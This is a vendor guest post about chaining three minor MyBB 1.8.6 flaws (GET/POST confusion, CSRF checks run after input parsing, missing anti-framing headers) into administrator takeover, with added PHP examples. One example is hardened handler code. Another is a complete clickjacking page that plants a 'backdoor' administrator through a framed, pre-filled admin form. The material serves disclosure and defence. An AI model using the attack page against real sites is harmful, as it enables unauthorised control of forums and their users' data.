The following is a guest post by Qualys, a 2016 Secure360 Twin Cities Gold Sponsor.
As attacks against web applications rise, security teams have naturally prioritized eliminating high-risk flaws such as SQL injection and cross-site scripting (XSS). The flip side is that many teams ignore or postpone the remediation of low-severity vulnerabilities in their web applications. That is not a wise strategy: by chaining several seemingly trivial weaknesses, an attacker can sometimes open a gap wide enough to do serious damage. In this article I will demonstrate such a scenario, showing how several unfixed low-severity issues combine into an attack that compromises the web application outright.
Low-level security issues share unique factors
For attackers, low-level vulnerabilities are cheap and easy to discover and straightforward to exploit. For instance, I surveyed clickjacking, which is usually treated as a minor issue, among the top 20 bank websites, and surprisingly found that 70 percent were at risk of clickjacking attacks in 2012 and 45 percent in 2015.
Meanwhile, webmasters usually treat low-level vulnerabilities as trivial until a real breach occurs. As a result, these issues persist longer in web applications, giving attackers time to leverage them in a larger attack.
Modern web application firewalls (WAFs) can be configured to block many low-level issues, but webmasters often do not bother, leaving these vulnerabilities as blind spots. A WAF that has not been tuned for them will not stop an attacker who manipulates the application through these low-level weaknesses.
Taken together, these factors explain why low-level security issues can open the first door to taking down a web application.
In a recent audit of MyBB, an open source application for building discussion forums, I found three low-level security issues. Exploited together, they could allow an attacker to gain full control of a MyBB installation. The issues have been partially addressed in the latest version, MyBB 1.8.7, so users of that version are no longer vulnerable to the attack chain described here.
Three low-level issues discovered in MyBB
MyBB 1.8.6 contains the following minor security issues, each of which seems trivial when evaluated on its own.
“GET” and “POST” methods are not distinguished
GET and POST are the most commonly used HTTP request methods. From a security perspective, sensitive data should always be submitted with POST: a GET request carries its parameters in the URL, where they end up in browser history and server logs and, more importantly, can be triggered by simply following a link. Those interested in the security differences between POST and GET in detail should read this article.
MyBB uses POST in its ACP (Administrator Control Pages) for submitting sensitive data, such as adding users, changing application settings and backing up the database. However, the application does not strictly distinguish POST from GET requests: although it is designed to use POST by default for sensitive requests such as adding an administrator user, the same parameters are also accepted when they arrive in a GET request.
Data is processed before the CSRF (cross-site request forgery) validation
A robust server should reject the request, and never parse the submitted values, when it detects that the CSRF token is invalid or missing. In this case, however, the application still parses the forged values and places them into the form's input fields even though the CSRF parameter is absent from the request. The forged request therefore fails only at the last step, the actual save, and leaves behind a form pre-filled with the attacker's values.
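To make the first two issues concrete, here is an added illustrative example (written for this post, not MyBB's own source): a simplified "add user" page of an admin control panel, first in the vulnerable shape described above and then hardened. The function names, the field names and the session key holding the anti-CSRF token are assumptions.

```php
<?php
// Added illustrative example, not MyBB's own code: a simplified "add user"
// page of an admin control panel, first in the vulnerable shape the article
// describes, then hardened. Function names, field names and the session key
// holding the anti-CSRF token are assumptions.
declare(strict_types=1);

session_start();
if (empty($_SESSION['csrf_token'])) {
    $_SESSION['csrf_token'] = bin2hex(random_bytes(32)); // per-session secret
}

/** Assumed persistence helper (in-memory stand-in for the user table). */
function add_user(string $username, string $group): void
{
    $GLOBALS['users'][$username] = $group;
}

/** Renders the form with the given values pre-filled and the token embedded. */
function render_form(string $username, string $group): string
{
    $esc = fn(string $s): string => htmlspecialchars($s, ENT_QUOTES, 'UTF-8');
    return '<form method="post">'
         . '<input name="username" value="' . $esc($username) . '">'
         . '<input name="usergroup" value="' . $esc($group) . '">'
         . '<input type="hidden" name="csrf_token" value="' . $esc($_SESSION['csrf_token']) . '">'
         . '<button name="do" value="add">Save</button>'
         . '</form>';
}

// ---- Vulnerable shape ------------------------------------------------------
// Issue 1: $_REQUEST merges query-string and body parameters, so everything
//          the POST form would send can equally arrive in a crafted GET link.
// Issue 2: the submitted values are copied into the form BEFORE the token is
//          checked, so a link with no token still produces a page whose form
//          is pre-filled with attacker-chosen values; the administrator only
//          has to click "Save" and the (now token-bearing) form submits them.
function vulnerable_add_user_page(): string
{
    $username = (string) ($_REQUEST['username'] ?? '');
    $group    = (string) ($_REQUEST['usergroup'] ?? 'member');

    if (($_REQUEST['do'] ?? '') === 'add') {
        if (($_REQUEST['csrf_token'] ?? '') === $_SESSION['csrf_token']) {
            add_user($username, $group);
            return 'User added';
        }
        // Bad or missing token: fall through and re-render the form, forged
        // values and all, instead of rejecting the request.
    }
    return render_form($username, $group);
}

// ---- Hardened shape --------------------------------------------------------
function hardened_add_user_page(): string
{
    // State-changing actions are accepted only via POST; a GET never reaches
    // the processing code and gets an empty form.
    if ($_SERVER['REQUEST_METHOD'] !== 'POST') {
        return render_form('', 'member');
    }

    // Validate the anti-CSRF token before looking at any other submitted
    // value; hash_equals() avoids a timing side channel on the comparison.
    $given = $_POST['csrf_token'] ?? '';
    if (!is_string($given) || !hash_equals($_SESSION['csrf_token'], $given)) {
        http_response_code(403);
        return 'Invalid or missing CSRF token';
    }

    $username = $_POST['username'] ?? '';
    $group    = $_POST['usergroup'] ?? 'member';
    if (!is_string($username) || !is_string($group) || $username === '') {
        http_response_code(400);
        return 'Bad input';
    }
    add_user($username, $group);
    return 'User added';
}

// Issue 3: tell browsers not to render ACP responses inside a frame.
function send_anti_framing_headers(): void
{
    header('X-Frame-Options: DENY');
    header("Content-Security-Policy: frame-ancestors 'none'");
}

send_anti_framing_headers();
echo hardened_add_user_page();
```

The ordering in the hardened handler is the point: method check, then token check, and only if both pass is any submitted field read at all. If the ACP legitimately frames itself, use `X-Frame-Options: SAMEORIGIN` and `frame-ancestors 'self'` instead of `DENY`/`'none'`; either way the headers must be emitted before any output, as shown.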
No clickjacking countermeasure
Clickjacking is an attack that tricks a user into clicking a button, link or image by loading the vulnerable page in a transparent iframe positioned over a decoy page, so that a click meant for the decoy lands on the framed page.
The absence of a clickjacking countermeasure is the third issue, and it is the last nail in the coffin. Because the ACP pages carry no anti-framing protection (such as an X-Frame-Options header), an attacker can frame them and trick the victim into clicking something inadvertently.
Gaining admin access by chaining these vulnerabilities
Once these minor issues are combined, gaining administrator access is as easy as taking candy from a baby. A GET link pre-fills the "add administrator" form with the attacker's values, the page is loaded inside an invisible frame on the attacker's site, and all that remains is a little social engineering to get the logged-in administrator to click a button or link on the framing page. More details can be found in the Qualys Blog.
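How the three issues chain together, as an added illustrative example (not code from the article, the Qualys blog or MyBB): the attacker-controlled page that frames the ACP with the forged values. The ACP URL, the parameter names, the pixel offsets and the decoy text are assumptions standing in for whatever the real target uses.

```php
<?php
// Added illustrative example, not from the article, the Qualys blog or MyBB:
// the attacker-controlled page that chains the three issues. The ACP URL,
// parameter names, pixel offsets and decoy text are assumptions standing in
// for whatever the real target uses.
declare(strict_types=1);

// Issues 1 and 2: the form fields travel in a GET URL. Because the target
// accepts GET for this action and copies the values into the form before the
// (absent) CSRF token is checked, the framed page loads with the "add user"
// form already filled in. The browser attaches the administrator's session
// cookie to the framed request, so what is framed is the real, authenticated
// ACP, not a copy.
$target = 'https://forum.example/admin/add_user.php?' . http_build_query([
    'username'  => 'backdoor',
    'password'  => 'Str0ngPassw0rd!',
    'usergroup' => 'administrator',
]);
?>
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>You won!</title>
<style>
  body { margin: 0; }
  /* Visible decoy the victim believes they are clicking. */
  #decoy {
    position: absolute; top: 150px; left: 100px; z-index: 1;
    padding: 12px 24px; font-size: 18px;
  }
  /* Issue 3: nothing stops the ACP from being framed. The frame is made
     fully transparent and shifted (offsets assumed) so the real "Save"
     button of the pre-filled form sits exactly on top of the decoy; the
     click intended for the decoy lands on "Save" and submits the form. */
  #target {
    position: absolute; top: -620px; left: -340px; z-index: 2;
    width: 1400px; height: 1000px; border: 0;
    opacity: 0;
  }
</style>
</head>
<body>
  <button id="decoy">Claim your prize</button>
  <iframe id="target" src="<?= htmlspecialchars($target, ENT_QUOTES, 'UTF-8') ?>"></iframe>
</body>
</html>
```

Two caveats worth knowing when testing this against a target of your own. First, the chain depends on the administrator's session cookie being sent with the framed request; browsers that default cookies to SameSite=Lax (Chrome since version 80 in 2020) do not attach such a cookie to a cross-site iframe load, a mitigation this 2016 article predates and that does not replace fixing the application. Second, removing any one link breaks the chain: refusing GET for the action, validating the token before touching the input, or sending X-Frame-Options / frame-ancestors each makes this page useless on its own.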
As the saying goes, small leaks will sink a big ship. Several low-level security issues can crack the hull of your web application, and the danger is especially real now that attackers have become more sophisticated and do not limit themselves to traditional exploits.
It is not uncommon for a low-level flaw to sit in a web application for a long time even though Qualys WAS (Web Application Scanner) flags it. I hope this article flashes a red warning light for webmasters and web developers the next time they have to decide whether to ignore low-level security issues.